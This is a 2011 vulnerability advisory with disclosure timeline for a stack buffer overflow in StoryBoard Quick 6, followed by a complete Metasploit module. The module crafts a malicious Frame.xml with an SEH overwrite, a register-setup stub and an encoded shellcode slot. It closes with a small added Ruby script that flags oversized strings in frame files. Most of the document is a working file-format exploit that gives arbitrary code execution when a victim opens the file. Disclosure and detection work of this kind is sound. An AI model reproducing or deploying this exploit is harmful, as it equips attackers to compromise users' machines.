# Name: StoryBoard Quick 6 Stack Buffer Overflow
# Vendor Website: http://www.powerproduction.com/
# Date Released: 29/11/2011
# Affected Software: StoryBoard Quick 6 (potentially also StoryBoard Artist and StoryBoard Studio)
# Researcher: Nick Freeman (nick.freeman@security-assessment.com)
#
# Description
# Security-Assessment.com has discovered a file format vulnerability in the XML files used to describe frames
# in the StoryBoard Quick 6 software. The <string> element used to define a filename was found to be
# vulnerable to a buffer overflow, which can be exploited to execute arbitrary code in the context of the
# user running StoryBoard Quick 6. Supplying a long file name causes memory corruption within the application.
# By crafting a file that contains more than 507 characters in the <string> field, the StoryBoard Quick 6
# application will use the next 4 characters in an unsafe manner. These four characters are used as a pointer
# to the source address for a string copy function. It is possible to write user-supplied data onto the stack
# by changing the value of these 4 characters to a memory location containing a pointer to data within the
# Frame.xml file. This strcpy call overwrites a significant portion of the stack, including the Structured
# Exception Handler.
#
# Disclosure Timeline:
# Security-Assessment.com practices responsible disclosure and made significant effort to report this
# vulnerability to PowerProduction Software.
# 13/06/2011: First email sent to PowerProduction, asking for contact details for security or developer
# personnel.
# 17/06/2011: After several attempts to get in contact, PowerProduction asks me for a customer number.
# 17/06/2011: Security-Assessment.com replies stating that this issue is exploitable without a customer number.
# No response was received from PowerProduction after this email.
# 23/06/2011: Security-Assessment.com sends a follow-up email stating that the vulnerability is still present.
# 10/07/2011: A final email is sent stating that PowerProduction customers are vulnerable.
# 05/11/11: Vulnerability released at Kiwicon V in Wellington, New Zealand.
# 19/11/11: Vulnerability released at Ruxcon 2011 in Melbourne, Australia.
# 29/11/11: Vulnerability advisory and exploit code published.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'StoryBoard Quick 6 Memory Corruption Vulnerability',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in StoryBoard Quick 6.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'vt [nick.freeman@security-assessment.com]' ],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'URL', 'http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf' ]
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
					'DisableNops'    => true,
					'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
					'EncoderOptions' =>
						{
							'BufferRegister' => 'EAX',
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Default (WinXP SP3 No DEP)', { } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Nov 30 2011',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.', "Frame-001.xml"]),
			], self.class)
	end

	def exploit
		# Frame.xml template; the REPLACE_* markers are substituted below.
		template = %Q|<plist version="1.0">
<dict>
	<key>ID</key>
	<integer>1</integer>
	<key>Objects</key>
	<array>
		<dict>
			<key>Size-X</key>
			<real>134.00000000</real>
			<key>Size-Y</key>
			<real>667.00000000</real>
			<key>Type</key>
			<string>cLIB</string>
			<key>Library</key>
			<string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 1.artgrid</string>
			<key>ID</key>
			<string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAREPLACE_1BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB.xo</string>
			<key>Colorization</key>
			<dict>
				<key>Arms</key>
				<string>ff4b70ff</string>
				<key>Eyes</key>
				<string>ff00ff00</string>
				<key>Hair</key>
				<string>ff68502d</string>
				<key>Face</key>
				<string>fffdd8a1</string>
				<key>REPLACE_2</key>
				<string>ff070707</string>
				<key>Skin</key>
				<string>ffd7b583</string>
				<key>Legs</key>
				<string>ff06007e</string>
			</dict>
			<key>Whom</key>
			<string>LINDA</string>
			<key>Scale-X</key>
			<real>0.74842578</real>
			<key>Scale-Y</key>
			<real>0.74842578</real>
			<key>Offset-Y</key>
			<real>41.60000610</real>
		</dict>
		<dict>
			<key>Size-X</key>
			<real>310.00000000</real>
			<key>Size-Y</key>
			<real>575.00000000</real>
			<key>Type</key>
			<string>cLIB</string>
			<key>Library</key>
			<string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 2.artgrid</string>
			<key>ID</key>
			<string>30012.xo</string>
			<key>Colorization</key>
			<dict>
				<key>Arms</key>
				<string>ff909090</string>
				<key>Eyes</key>
				<string>ff00ff00</string>
				<key>Hair</key>
				<string>ff090909</string>
				<key>Face</key>
				<string>ffff0837</string>
				<key>Shoe</key>
				<string>ff1100c2</string>
				<key>Skin</key>
				<string>ffb78d4f</string>
				<key>Legs</key>
				<string>ff050505</string>
			</dict>
			<key>Whom</key>
			<string>C.J.</string>
			<key>Scale-X</key>
			<real>0.86817396</real>
			<key>Scale-Y</key>
			<real>0.86817396</real>
			<key>Offset-Y</key>
			<real>41.60000610</real>
		</dict>
		<dict>
			<key>IsSelected</key>
			REPLACE_3<true/>
			<key>Size-X</key>
			<real>682.00000000</real>
			<key>Size-Y</key>
			<real>565.00000000</real>
			<key>Type</key>
			<string>cLIB</string>
			<key>Library</key>
			<string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 1.artgrid</string>
			<key>ID</key>
			<string>30013.xo</string>
			<key>Colorization</key>
			<dict>
				<key>Arms</key>
				<string>ff4b70ff</string>
				<key>Eyes</key>
				<string>ff00ff00</string>
				<key>Hair</key>
				<string>ff68502d</string>
				<key>Face</key>
				<string>fffdd8a1</string>
				<key>Shoe</key>
				<string>ff070707</string>
				<key>Skin</key>
				<string>ffd7b583</string>
				<key>Legs</key>
				<string>ff06007e</string>
			</dict>
			<key>Whom</key>
			<string>LINDA</string>
			<key>Scale-X</key>
			<real>0.95718473</real>
			<key>Scale-Y</key>
			<real>0.95718473</real>
			<key>Offset-Y</key>
			<real>62.40469360</real>
		</dict>
	</array>
	<key>FrameDB</key>
	<dict>
		<key>TXT-0006</key>
		<data>
		MDYvMDMvMTEgMjM6Mjg6MDMA
		</data>
	</dict>
	<key>UN-Thumb</key>
	<true/>
</dict>
</plist>
|

		# The 4 bytes following the 507-character string are used as the source
		# pointer for the string copy described in the advisory.
		sploit = template.gsub(/REPLACE_1/, "\xd9\xcf\xe5\x74")

		padd = "\x43" * 4256
		nseh = "\x90\xeb\x06\x90"
		seh  = "\x25\x12\xd1\x72" # POP, POP, RETN
		nops = "\x90" * 9

		# set buffer register
		bufregstub  = "\x8b\xc4"     # mov eax, esp
		bufregstub += "\x33\xc9"     # xor ecx, ecx
		bufregstub += "\x83\xc1\x7f" # add ecx, 0x7f
		bufregstub += "\x6b\xc9\x17" # imul ecx, 0x17
		bufregstub += "\x83\xc1\x7b" # add ecx, 0x7b
		bufregstub += "\x03\xc1"     # add eax, ecx
		# eax now points to buffer, ready to decode shellcode.

		sploit = sploit.gsub(/REPLACE_2/, padd + nseh + seh + nops + bufregstub + payload.encoded + ("\x44" * (11137 - payload.encoded.length)))
		sploit = sploit.gsub(/REPLACE_3/, "\x45" * 658)

		print_status("Creating '#{datastore['FILENAME']}' file ...")
		file_create(sploit)
	end
end
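A defensive check added here, not part of the advisory or the Metasploit module above: a Ruby triage script that scans a StoryBoard Frame*.xml plist and flags any <string> value longer than the 507-character limit the advisory describes, reporting which <key> it belongs to. The sample frames, the MAX_SAFE_LEN constant and the function names are constructed for this example; the scan is a lightweight element walk, not a full plist parser.

```ruby
# Added example (not from the advisory or the module): flag oversized <string>
# values in a StoryBoard Frame.xml plist. MAX_SAFE_LEN is the 507-character
# limit quoted in the advisory; the constant name is an assumption.
MAX_SAFE_LEN = 507

# Returns [key_name, length] for every <string> whose content exceeds max_len.
# Follows the <key>...</key><string>...</string> pairing of plist dictionaries;
# a <string> with no preceding <key> is reported under "(no key)".
def oversized_strings(xml, max_len = MAX_SAFE_LEN)
  findings = []
  last_key = "(no key)"
  # Walk <key> and <string> elements in document order (multi-line safe).
  xml.scan(%r{<(key|string)>(.*?)</\1>}m) do |tag, body|
    if tag == "key"
      last_key = body
    elsif body.length > max_len
      findings << [last_key, body.length]
    end
  end
  findings
end

# True when the frame file carries at least one oversized string.
def frame_suspicious?(xml, max_len = MAX_SAFE_LEN)
  !oversized_strings(xml, max_len).empty?
end

# Constructed samples: a benign frame, and one carrying an oversized ID string.
BENIGN_FRAME = <<~XML
  <plist version="1.0"><dict>
    <key>ID</key><string>30012.xo</string>
    <key>Library</key><string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 2.artgrid</string>
  </dict></plist>
XML

MALFORMED_FRAME = <<~XML
  <plist version="1.0"><dict>
    <key>ID</key><string>#{"A" * 600}.xo</string>
    <key>Whom</key><string>LINDA</string>
  </dict></plist>
XML

if __FILE__ == $0
  [BENIGN_FRAME, MALFORMED_FRAME].each_with_index do |frame, i|
    puts "frame #{i}: suspicious=#{frame_suspicious?(frame)} #{oversized_strings(frame).inspect}"
  end
end
```

Run it against a directory of Frame*.xml files before opening a project from an untrusted source; any hit on the ID key is the pattern the advisory describes.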